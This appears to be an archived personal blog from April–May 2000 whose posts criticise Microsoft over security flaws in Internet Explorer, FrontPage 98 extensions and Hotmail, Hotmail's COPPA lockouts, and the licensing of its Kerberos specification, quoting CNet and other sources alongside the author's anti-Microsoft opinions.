Archive 9

Even being the richest man in the world doesn't stop you from getting a pie in the face.

"But godliness with contentment is great gain."
1 Timothy 6:6 (NIV).

Danger - MS Programming

Posted 11 April 2000.

A guy named Noah Patton wrote to MacOS Rumors the following regarding MSIE5:

When I.E. 5 came out, I downloaded it and took a look. I decided it was nothing special, and promptly went back to Netscape 4.7.2 and Eudora 4.2.2. Today, I loaded IE back up and discovered that under Edit -> Preferences -> Network -> Site Passwords it has been keeping a complete list of every e-mail account I ever checked, complete with passwords in some cases, every FTP site I have ever logged into, again with passwords in some cases. Very Scary!

The worst part is that I never even used IE; I immediately went back to using Netscape and Eudora.

I am VERY unhappy to have discovered this log, and have already removed internet explorer 5. I have so far been unable to figure out how to turn off the logging system, and if I did I'm not sure I would trust that it was really turned off.

Mac OS Rumors claims to have received over a hundred such reports during the past week. My oft-repeated advice: Refuse to use any MS products.

MS Dorks At It Again

Posted 15 April 2000.

As concerns at high level are being expressed about how the way Microsoft is muscling in on streaming video is very similar to the way it worked the browser market, Microsoft's software is getting them in trouble. AGAIN.

Microsoft said its engineers included a secret back door including the phrase "Netscape engineers are weenies!" in Web site authoring software that could allow hackers to gain unauthorized access to potentially thousands of Web sites.

... Hackers knowing how to exploit the vulnerability could access any site using FrontPage 98 extensions, Microsoft said. FrontPage, a Web authoring and site management software package, requires that special software code--or extensions--be present on the Web site for all features to be available.


"This is a vulnerability because it allows an author on one Web site on a shared server to see anything on another server," said Steve Lipner, manager of Microsoft's Security Response Center.


Microsoft apparently has been shipping software with the vulnerability for several years, possibly since 1996. Because Microsoft provides FrontPage 98 free with Windows NT 4.0 Server, the software is widely used for hosting Web sites on the Internet and across corporate intranets.

... access to Web site management files and possibly credit card information and user passwords.

Although Microsoft is treating the problem "as a serious security risk," a spokeswoman downplayed its overall effect. "Very few people are still using FrontPage 98," she said. "Most people are using FrontPage 2000."

"Yeah, right!" is what my brother said when he read that. (In a world where more businesses use Windows 95 than 98.)


Mark Bowden, president of BugNet, which supplies software bug fixes, ... disagreed with Microsoft's contention that FrontPage 98 extensions are no longer widely used. "I've seen so many problems converting over to FrontPage 2000. It's not seamless," he said.

The password back door is potentially most devastating for companies that host commercial and consumer Web sites. Hosting providers typically apply FrontPage extensions individually to hundreds of thousands of Web sites, meaning the problem could be difficult to clean up.


Software code enabling the back door includes the phrase "Netscape engineers are weenies!"


"Microsoft has a really ugly situation on (its) hands," said Gartner Group analyst Michael Gartenberg. "This is a major, major issue for Microsoft because it's going to hurt their credibility at a time when they're straining from a credibility perspective."

I believe I've already given a specific warning against using FrontPage (as well as multiple warning against using any MS products).

This Week's Security Scare

Posted 19 April 2000.

More from CNet:

Microsoft is battling a second security problem in Web management software used on hundreds of thousands of Web sites around the world.

As reported on Friday, Microsoft acknowledged that rogue software code containing the phrase "Netscape engineers are weenies!" was included in its Windows NT operating system and could open up Web sites to unauthorized access. The nearly five-year-old code also can be used to crash Web sites running FrontPage 98 server extensions, Microsoft has acknowledged.

Now, in a second security notice posted late Friday, Microsoft warned: "Shortly after publishing the bulletin, we learned of a new, separate vulnerability that significantly increases the threat to users of these products."

The new vulnerability potentially exposes hundreds of thousands of Web sites to denial-of-service attacks, whereby hackers could overrun the code with data and crash the sites. Because Microsoft distributes FrontPage 98 for free with the Windows NT 4 server, it is widely used by companies offering Web hosting services.

"We are treating this as a very serious problem, even though it is different than what we first thought," said Steve Lipner, manager of Microsoft's Security Response Center.


"For the past several years it's been apparent that Microsoft's security development and testing process has been way behind its ability to put out products," said John Pescatore, a security analyst with Gartner Group.

Hmmm. Now how do we spell it again? Aviod... afoid... AVOID all MS products.

Warning: New OS

Posted 19 April 2000.

The big monopoly of Microsoft has apparently withdrawn Windows CE and replaced it with something they call Pocket PC. Be warned, and avoid products with Pocket PC in them.

Microsoft spokesman:

"In hindsight, we realized that our software experience was too complex, and from a hardware standpoint maybe we didn't have as good designs."

Windows Us Again

Posted 19 April 2000.

From CNet:

Microsoft has decided to include software in its Windows Me operating system that will allow consumers to hook their PCs into networking software from two competitors after all, an about-face prompted by customer and industry complaints.

The Redmond, Wash.-based software giant last month decided not to incorporate a "networking client" for Novell and Banyan networking software in Windows Me, its upcoming operating system for home PC users. News of the decision prompted a rash of complaints. The company now has reversed itself and will put the software back into the OS.


Microsoft's argument was assailed by critics who claimed the distinction was artificial and would force small and home business users to upgrade to Windows 2000, which costs about $100 more. In addition, Microsoft's decision to leave its own proprietary networking client in Windows Me, while dropping support for its third-party competitors, raised questions about whether the move was motivated by competitive concerns.

"When users don't like the decisions Microsoft is making on their behalf, they do have ways of expressing their displeasure," said Michael Gartenberg, an analyst at Gartner Group, which first reported the move in a bulletin.


The development of Windows Me has been somewhat tumultuous. Originally envisioned as the consumer version of Windows NT, Microsoft dramatically scaled back its focus as part of a decision to extend Windows 98 into a family of products. The company will release a consumer version of Windows 2000 within the next five years, Microsoft has said.


"I'm not surprised Microsoft backed down," Gartenberg said. "They had everything to lose and nothing to gain by dropping it."

Disclaimer: PieGate is not believed to have been instrumental in this backdown.

Yet Another Hotmail Bug

Posted 3 May 2000.

There are many other large free email services that don't get in the news this often.

Microsoft has patched a Hotmail bug that left users of the Web-based email service vulnerable to a password-stealing trick.

The exploit was the latest in a series devised by bug hunters using JavaScript to launch fraudulent password entry screens to trick people into handing over control of their accounts.


In the example addressed by Hotmail this week, Bulgarian bug hunter Georgi Guninski demonstrated a way to inject JavaScript through a style tag. The exploit worked only with Microsoft's Internet Explorer browser.

Surprise, surprise.

MS Hotmail Goof

Posted 3 May 2000.

Those who are still masochistic enough to use MS products, do pay special attention to just what you tell them when you sign up or register.

Microsoft's implementation of a new federal law protecting children's privacy has cost some Hotmail customers their accounts.

Some Hotmail members found themselves permanently shut out of their accounts after Microsoft enacted changes to comply with new regulations that mandate parental consent for Net users under the age of 13.

The Children's Online Privacy Protection Act (COPPA), a federal law that went into effect Friday, requires Web sites that collect personal information to get parental consent for visitors under the age of 13.

"With the solution in place, we're finding that a handful of Hotmail users residing in the U.S. incorrectly provided an age that was less than 13 when they created their Hotmail account," a Microsoft representative said.

Microsoft said it warned U.S. customers whose profiles indicated they were under 13 that they would need to provide parental consent to use Hotmail after April 21.

But one adult who lost an account claimed no memory of being warned by Hotmail.

"I have been a Hotmail user for several years now, and don't think I ever registered as a user 'under the age of 13," the Hotmail account holder wrote in an email interview. "But even if I had--who can remember? They should have given us better notice of how to work around/verify the info and warned us we would be permanently locked out."

Microsoft offered no hope for getting those accounts restored to their original registrants.

"These accounts cannot be reactivated because the users provided inaccurate information," the Microsoft representative said. "However, these users can create a new Hotmail account and provide the appropriate information which will comply with COPPA."

Emphasis added.

Court Quote

Posted 3 May 2000.

New York state Attorney General Eliot Spitzer:

"It is astonishing to me that Microsoft's two highest executives continue to ignore the case that the states' and federal governments have proved in court... And it is astonishing to me that they continue to present themselves as desiring to empower consumers, when their conduct shows a clear desire to restrict consumer choice and confine consumers only to those products that Microsoft wants to produce."

Cookie Jar Ajar

Posted 12 May 2000.

From the Who-Else-Has-Known-About-This? department:

If you're using Microsoft Internet Explorer running on Microsoft Windows, be aware that your cookie file is readable by any hostile website. Or, if you'd like to see the security hole in action, leave Javascript on and check it out: "Open Cookie Jar."

My Macintosh doesn't have any Microsoft software on it.

Open Source, But Not Open

Posted 12 May 2000.

Ted and Jeremy (Samba Boys):

Microsoft, after getting beat up in the press for making propietary extensions to the Kerberos [security] protocol, has released the specifications on the web -- but in order to get it, you have to run a Windows .exe file which forces you agree to a click-through license agreement where you agree to treat it as a trade secret, before it will give you the .pdf file. Who would have thought that you could publish a trade secret on the web?

The critical part of the license states:

b. The Specification is confidential information and a trade secret of Microsoft. Therefore, you may not disclose the Specification to anyone else (except as specifically allowed below), and you must take reasonable security precautions, at least as great as the precautions you take to protect your own confidential information, to keep the Specification confidential. If you are an entity, you may disclose the Specification to your full-time employees on a need to know basis, provided that you have executed appropriate written agreements with your employees sufficient to enable you to comply with the terms of this Agreement.

This is course is a very clever way to pretend to distribute the spec, whilst making it completely impossible to implement in competiting implementations which implements their propietary protocol extensions -- extensions to a protocol which was originally published by the Kerberos team as an Open Standard in the IETF. This completely defeats the IETF's interoperability goals, and helps Microsoft leverge their desktop monopoly into the server market.

The one good thing about Microsoft having pulled this dirty trick is that it makes their propietary intentions about the Windows 2000 PDC clear as day. I doubt anyone else could come up with a charitable explanation for what they've done. What a better example of Microsoft's "embrace, extend, and engulf" business model!

Jeremy Allison,
Samba Team.